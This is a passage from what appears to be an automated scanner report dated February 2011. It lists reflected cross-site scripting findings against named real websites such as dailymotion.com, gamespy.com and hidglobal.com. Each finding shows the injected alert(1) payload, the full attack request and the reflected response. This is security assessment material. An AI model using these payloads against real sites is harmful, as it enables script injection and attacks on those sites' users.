Set-Cookie: JSESSIONID=3D979C10B4F0B191A55BEE8C0EE25E67; Path=/
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive
Content-Length: 141731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http:/
...[SNIP]...
s_265.linkInternalFilters="javascript:,dailyfinance.com";

s_265.trackExternalLinks=true;

s_265.mmxgo=true;

s_265.prop1="Main";
s_265.prop2="Main";
s_265.prop12="http://www.dailyfinance.com/?6b822"-alert(1)-"057c5998ce7=1";
s_265.prop21="";

var s_code=s_265.t();
}
var s_account="aoldailyfin,aolsvc";
(function(){
var d = document, s = d.createElement('script');
s.type = 'text/javascript';
s.src =
...[SNIP]...

3.41. http://www.dailymotion.com/us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailymotion.com
Path:   /us

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bc84"-alert(1)-"af6a088c7fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us?3bc84"-alert(1)-"af6a088c7fa=1 HTTP/1.1
Host: www.dailymotion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: DMS/1.0.42
Content-Type: text/html; charset=utf-8
P3p: policyref="http://www.dailymotion.com/w3c/p3p.xml", CP="IDC DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Mon, 28 Feb 2011 13:36:18 GMT
X-DM-Cache: DONT
Connection: close
Set-Cookie: tg=224970; expires=Sun, 28-Feb-2021 13:36:18 GMT; path=/
Set-Cookie: dmvk=4d6ba4d29d5ad; path=/; domain=.dailymotion.com
Set-Cookie: ql_n=0; expires=Tue, 28-Feb-2012 13:36:18 GMT; path=/
Set-Cookie: masscast=b%3A0%3B; path=/
X-Dm-Page: us.html.home

<!DOCTYPE html>
<html xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head id="head">
<title>Dailymotion - Online Videos, Music, and Movies. Watch a Video Today!</title>
<meta http-equiv=
...[SNIP]...
("dailimotion");
ga._addIgnoredOrganic("dalimotion");
ga._addIgnoredOrganic("dailymation");
ga._setCustomVar(3, "page_type", "home", 3);
ga._setCustomVar(4, "segment", "23", 1);
ga._trackPageview("/us?3bc84"-alert(1)-"af6a088c7fa=1&site_version=us");
var timeTracker = new TimeTracker();
timeTracker._recordStartTime();
setTimeout('timeTracker._recordEndTime(); timeTracker._track(ga, "Time spent", "5 mn");', 300000);
} catch(err
...[SNIP]...

3.42. http://www.davidcorn.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidcorn.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4efc8"><script>alert(1)</script>88769f13774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4efc8"><script>alert(1)</script>88769f13774=1 HTTP/1.1
Host: www.davidcorn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 28 Feb 2011 13:20:50 GMT
Content-type: text/html
Connection: close

<html><head><title>DAVIDCORN.COM</title><meta name="keywords" content=""</head><frameset rows="100%", *" border="0" frameborder="0"><frame src="http://www.politicsdaily.com/bloggers/david-corn?4efc8"><script>alert(1)</script>88769f13774=1" name="DAVIDCORN.COM">
...[SNIP]...

3.43. http://www.dorkly.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dorkly.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efd19"-alert(1)-"592b3cfc057 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?efd19"-alert(1)-"592b3cfc057=1 HTTP/1.1
Host: www.dorkly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: jument_hash=deleted; expires=Sun, 28-Feb-2010 13:34:56 GMT; path=/; domain=dorkly.com
Set-Cookie: jument_hash=35e5f849e4fd648c6c9447eb88225ce46de82878; expires=Sun, 28-Feb-2016 18:38:47 GMT; path=/; domain=dorkly.com
Set-Cookie: jument_hash=35e5f849e4fd648c6c9447eb88225ce46de82878; expires=Sun, 28-Feb-2016 18:38:47 GMT; path=/; domain=dorkly.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" xmlns:fb="http://www.facebook.com/2008/fbml">
<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...
"ctype":"other","sec":"homepage"};
       jument.ad_site = "5480.iac.dorkly";
       jument.cookie.domain = "dorkly.com";
       jument.home_url = "http://www.dorkly.com";
       jument.this_url = "http://www.dorkly.com/?efd19"-alert(1)-"592b3cfc057=1";
       jument.user_id = 0;
           </script>
...[SNIP]...

3.44. http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.electronista.com
Path:   /articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df336"><script>alert(1)</script>5b462ef68bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?df336"><script>alert(1)</script>5b462ef68bb=1 HTTP/1.1
Host: www.electronista.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:12 GMT
Server: Apache
Set-Cookie: PHPSESSID=c1k5cs9qkiv9co1c1aoh22kq11; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 78218


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<fb:login-button length="long" onlogin="window.location = 'http://www.electronista.com//articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?df336"><script>alert(1)</script>5b462ef68bb=1';">
...[SNIP]...

3.45. http://www.emedicinehealth.com/script/main/hp.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.emedicinehealth.com
Path:   /script/main/hp.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fd1a"-alert(1)-"05fadde8b32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /script/main/hp.asp?5fd1a"-alert(1)-"05fadde8b32=1 HTTP/1.1
Host: www.emedicinehealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50538
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDCADDAARB=KDOLCAEBOCBHAPPAIGFIIJPN; path=/
X-Powered-By: ASP.NET
Date: Mon, 28 Feb 2011 13:36:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>

<HEAD>
<META http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<!--
var s_account = "webmdcom";
var s_pagename = "emedicinehealth.com/script/main/hp.asp?5fd1a"-alert(1)-"05fadde8b32=1";
var s_bu = "cns";
var s_siteclass = "od";
var s_site = "emedicinehealth";
var s_server_type = "MN";
var s_channel_health = "eMedicineHealth";
var s_refpath = "eMedicineHealth";
var s_server
...[SNIP]...

3.46. http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98c4c"><script>alert(1)</script>3360a8f21eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?98c4c"><script>alert(1)</script>3360a8f21eb=1 HTTP/1.1
Host: www.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:14 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999980
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 77750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
<link rel="canonical" href="http://www.fanhouse.com/?98c4c"><script>alert(1)</script>3360a8f21eb=1"/>
...[SNIP]...

3.47. http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfcfe"-alert(1)-"db2bbd22746 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bfcfe"-alert(1)-"db2bbd22746=1 HTTP/1.1
Host: www.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:15 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999969
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 77675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="Fanhouse Main";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://www.fanhouse.com/?bfcfe"-alert(1)-"db2bbd22746=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

3.48. http://www.food.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.food.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ace1"-alert(1)-"68cbd1d9049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5ace1"-alert(1)-"68cbd1d9049=1 HTTP/1.1
Host: www.food.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Length: 109969
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=c7c1213e9f8670c7914fd0a08af6.foodweb01i1; Path=/
X-Powered-By: JSP/2.1
X-Cnection: close
Expires: Mon, 28 Feb 2011 13:36:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:36:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


                               <html>


<head>
   
   <meta http-equiv="Content-type" cont
...[SNIP]...

   if(!SNI.RZ.Sifter){
       SNI.RZ.Sifter = {}
   }
   //initialize with emptyString to make sure the Sifer Object initialized no matter what we have in the request.
   
   SNI.RZ.Sifter.sifter_urlParams = "5ace1"-alert(1)-"68cbd1d9049=1";
   
   </script>
...[SNIP]...

3.49. http://www.forex-direkt.de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forex-direkt.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b6ea9--><script>alert(1)</script>be43e62c830 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b6ea9--><script>alert(1)</script>be43e62c830=1 HTTP/1.1
Host: www.forex-direkt.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Mon, 28 Feb 2011 13:36:20 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.12
X-Pingback: http://www.forex-direkt.de/xmlrpc.php
Set-Cookie: WPS_return_count=1; expires=Tue, 28-Feb-2012 13:36:20 GMT; path=/
Set-Cookie: WPS_date=20110228; expires=Tue, 01-Mar-2011 13:36:20 GMT
Set-Cookie: WPS_display_count=0; expires=Tue, 01-Mar-2011 13:36:20 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">

<head p
...[SNIP]...
<form action="http://www.forex-direkt.de/?b6ea9--><script>alert(1)</script>be43e62c830=1&amp;subscribe=true" method="post" class="subscribeform">
...[SNIP]...

3.50. http://www.forex-direkt.de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forex-direkt.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46e87"><script>alert(1)</script>2aa589d6daa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46e87\"><script>alert(1)</script>2aa589d6daa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?46e87"><script>alert(1)</script>2aa589d6daa=1 HTTP/1.1
Host: www.forex-direkt.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Mon, 28 Feb 2011 13:36:16 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.12
X-Pingback: http://www.forex-direkt.de/xmlrpc.php
Set-Cookie: WPS_return_count=1; expires=Tue, 28-Feb-2012 13:36:16 GMT; path=/
Set-Cookie: WPS_date=20110228; expires=Tue, 01-Mar-2011 13:36:16 GMT
Set-Cookie: WPS_display_count=0; expires=Tue, 01-Mar-2011 13:36:16 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">

<head p
...[SNIP]...
<form action="http://www.forex-direkt.de/?46e87\"><script>alert(1)</script>2aa589d6daa=1&amp;subscribe=true" method="post" class="subscribeform">
...[SNIP]...

3.51. http://www.gamespy.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamespy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 103ac"-alert(1)-"33fbd95695d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?103ac"-alert(1)-"33fbd95695d=1 HTTP/1.1
Host: www.gamespy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 28 Feb 2011 13:36:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:36:22 GMT
Content-Length: 12461
Connection: close
Set-Cookie: decc=US;Path=/;Domain=.gamespy.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: NGUserID=a016c03-31164-59761546-7;Path=/;Domain=.gamespy.com;Expires=Tue, 27-Aug-30 13:36:22 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: freq=c-1298900182855v-1n-22mc+1298900182855mv+1mn+22wwe~0;Path=/;Domain=.gamespy.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html><head>
   <title>GameSpy.com Advertisement</title>
   <meta http-equ
...[SNIP]...
if(docTitle == '') {
docTitle = defaultContinueTo;
}
document.write(docTitle);
}

   function goBackToReferer(){
       document.location.href = "http://www.gamespy.com/?103ac"-alert(1)-"33fbd95695d=1";
return true;
   
   }
   setTimeout('goBackToReferer()',18000);
</script>
...[SNIP]...

3.52. http://www.gamespy.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamespy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39605"><script>alert(1)</script>81ff83ced4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?39605"><script>alert(1)</script>81ff83ced4e=1 HTTP/1.1
Host: www.gamespy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 28 Feb 2011 13:36:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:36:22 GMT
Content-Length: 12491
Connection: close
Set-Cookie: decc=US;Path=/;Domain=.gamespy.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: NGUserID=a016c0a-4689-2127784655-1;Path=/;Domain=.gamespy.com;Expires=Tue, 27-Aug-30 13:36:22 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: freq=c-1298900182063v-1n-22mc+1298900182063mv+1mn+22wwe~0;Path=/;Domain=.gamespy.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html><head>
   <title>GameSpy.com Advertisement</title>
   <meta http-equ
...[SNIP]...
<A href="http://www.gamespy.com/?39605"><script>alert(1)</script>81ff83ced4e=1" CLASS="prestitial_text3">
...[SNIP]...

3.53. http://www.gamestats.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamestats.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29d97"-alert(1)-"4fa0d5b0b5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?29d97"-alert(1)-"4fa0d5b0b5e=1 HTTP/1.1
Host: www.gamestats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 28 Feb 2011 13:36:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:36:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.gamestats.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamestats.com
Set-Cookie: NGUserID=a016c06-16607-290622490-3;Path=/;Domain=.gamestats.com;Expires=Tue, 27-Aug-30 13:36:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamestats.com
Set-Cookie: freq=c-1298900191752v-1n-21mc+1298900191752mv+1mn+21wwe~0;Path=/;Domain=.gamestats.com
Content-Length: 144009


<html><head>
<script type="text/javascript" src="http://scripts.gamestats.com/scripts/common/data.js"></script>
<script type="text/javascript" src="http://scripts.gamestats.com/scripts/common/util
...[SNIP]...
cript>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://www.gamestats.com/?29d97"-alert(1)-"4fa0d5b0b5e=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

3.54. http://www.gamestats.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamestats.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21efb"><script>alert(1)</script>4afc3c5b2ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21efb"><script>alert(1)</script>4afc3c5b2ca=1 HTTP/1.1
Host: www.gamestats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 28 Feb 2011 13:36:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:36:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.gamestats.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamestats.com
Set-Cookie: NGUserID=a016c09-25262-1349998991-1;Path=/;Domain=.gamestats.com;Expires=Tue, 27-Aug-30 13:36:30 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamestats.com
Set-Cookie: freq=c-1298900190426v-1n-21mc+1298900190426mv+1mn+21wwe~0;Path=/;Domain=.gamestats.com
Content-Length: 144291


<html><head>
<script type="text/javascript" src="http://scripts.gamestats.com/scripts/common/data.js"></script>
<script type="text/javascript" src="http://scripts.gamestats.com/scripts/common/util
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://www.gamestats.com/?21efb"><script>alert(1)</script>4afc3c5b2ca=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

3.55. http://www.giga.de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.giga.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21313"><script>alert(1)</script>927f81afa7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21313"><script>alert(1)</script>927f81afa7f=1 HTTP/1.1
Host: www.giga.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:30 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/5.2.0-8+etch13
Set-Cookie: PHPSESSID=08079c436ffd5481b342f301bb14be44; path=/; domain=.giga.de
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 71706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>

...[SNIP]...
<input type="hidden" name="url" value="http://www.giga.de/?21313"><script>alert(1)</script>927f81afa7f=1?" />
...[SNIP]...

3.56. http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /onlineOrderStatusRegistration.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ff75f--><script>alert(1)</script>0572c754cb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlineOrderStatusRegistration.php?ff75f--><script>alert(1)</script>0572c754cb3=1 HTTP/1.1
Host: www.hidglobal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=60cqljckjdoei6t85ca874vls3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<onlineOrderStatusRegistration.php?ff75f--><script>alert(1)</script>0572c754cb3=1'>
...[SNIP]...

3.57. http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /onlineOrderStatusRegistration.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6cceb'><script>alert(1)</script>0baa5dff093 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlineOrderStatusRegistration.php?6cceb'><script>alert(1)</script>0baa5dff093=1 HTTP/1.1
Host: www.hidglobal.com
Accept: */*
Accept-Language: en
